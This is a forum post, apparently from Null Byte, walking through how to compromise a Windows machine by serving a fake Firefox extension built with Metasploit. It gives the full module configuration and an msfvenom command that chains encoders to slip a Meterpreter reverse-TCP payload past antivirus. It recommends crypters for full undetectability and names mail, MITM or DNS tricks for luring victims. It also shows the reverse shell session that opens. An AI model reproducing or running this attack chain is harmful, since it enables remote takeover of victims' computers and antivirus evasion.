Forum Thread: Compromising a Computer Using a Fake Firefox Extension

Using social engineering we will try to have a user install a fake Firefox extension to get a remote session on their system.

Through the Metasploit module firefoxxpibootstrapped_addon , we will create an .xpi file that will be presented to the victim inside a web page. When the user visits it, your Firefox browser will ask you if you trust and want to install the extension. If the user clicks 'install' will execute the payload with the permissions of the user.

We will do a simple demonstration against a Windows XP SP3.

Step 1: Open the Console of Metasploit (Msfconsole), Update and Load the Corresponding Module:

Code:
msf > use exploit/multi/browser/firefoxxpibootstrapped_addon
msf exploit(firefoxxpibootstrapped_addon) >

Step 2: Now Proceed to Configure the Addon:

Code:
msf exploit(firefoxxpibootstrapped_addon) > set addonname falso
addonname => falso
msf exploit(firefoxxpibootstrapped_addon) > set SRVHOST 192.168.1.35
SRVHOST => 192.168.1.35
msf exploit(firefoxxpibootstrapped_addon) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefoxxpibootstrapped_addon) > set URIPATH fakeEx
URIPATH => fakeEx
msf exploit(firefoxxpibootstrapped_addon) > set LHOST 192.168.1.35
LHOST => 192.168.1.35

Step 3: Next We Prepare Our Payload to Try That the AV Does Not Detect It. First with Msfvenom:

Code:

D:\metasploit4>ruby\bin\ruby.exe msf3\msfvenom --payload windows/meterpreter/reversetcp --format exe --encoder x86/shikataganai --iterations 10 -e x86/countdown -i 3 -e x86/call4dwordxor -i 5 -e x86/jmpcall_additive -i 5 -f c LHOST=192.168.1.35 > trojan.exe

* x86/jmpcalladditive succeeded with size 321 (iteration=1)
* x86/jmpcalladditive succeeded with size 353 (iteration=2)
* x86/jmpcalladditive succeeded with size 385 (iteration=3)
* x86/jmpcalladditive succeeded with size 417 (iteration=4)
* x86/jmpcalladditive succeeded with size 449 (iteration=5)

Then You Will Have to Use Another Crypter if You Want Your Payload to Be as FuD as Possible ... So It Does Not Cost Anything to Modify a Stub and Use Some of Those So Sexy on the Net ;)

Then We Load the Payload for Our Module:

msf exploit(firefoxxpibootstrapped_addon) > set PAYLOADFILE d:\\metasploit4\\trojan.exe
PAYLOADFILE => d:\metasploit4\trojan.exe
payload => windows/meterpreter/reverse_tcp

And we launched the exploit:

Code:

msf exploit(firefoxxpibootstrapped_addon) > exploit
* Exploit running as background job.
msf exploit(firefoxxpibootstrapped_addon) >
* Started reverse handler on 192.168.1.35:4444
* Using URL: http://192.168.1.35:80/fakeEx
* Server started.

Step 4: Now That We Have Everything Running We Only Need the User to Visit Our URL (Mail, MITM, DNS, ...) And Install the Fake Firefox Extension

Code: Select
msf exploit(firefoxxpibootstrapped_addon) >
* 192.168.1.35 firefoxxpibootstrapped_addon - Sending xpi and waiting for user to click 'accept'...

If you fall into the trap, we will get the remote session:

Code:

* Sending stage (752128 bytes) to 192.168.1.35
* Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.35:15831) at 2012-05-28 19:11:57 +0200

msf exploit(firefoxxpibootstrapped_addon) > sessions -i

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 192.168.1.35:4444 -> 192.168.1.35:15831 (192.168.1.35)

grreetings ......

Get The Weekly Null Byte Newsletter

Never miss a Null Byte guide.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active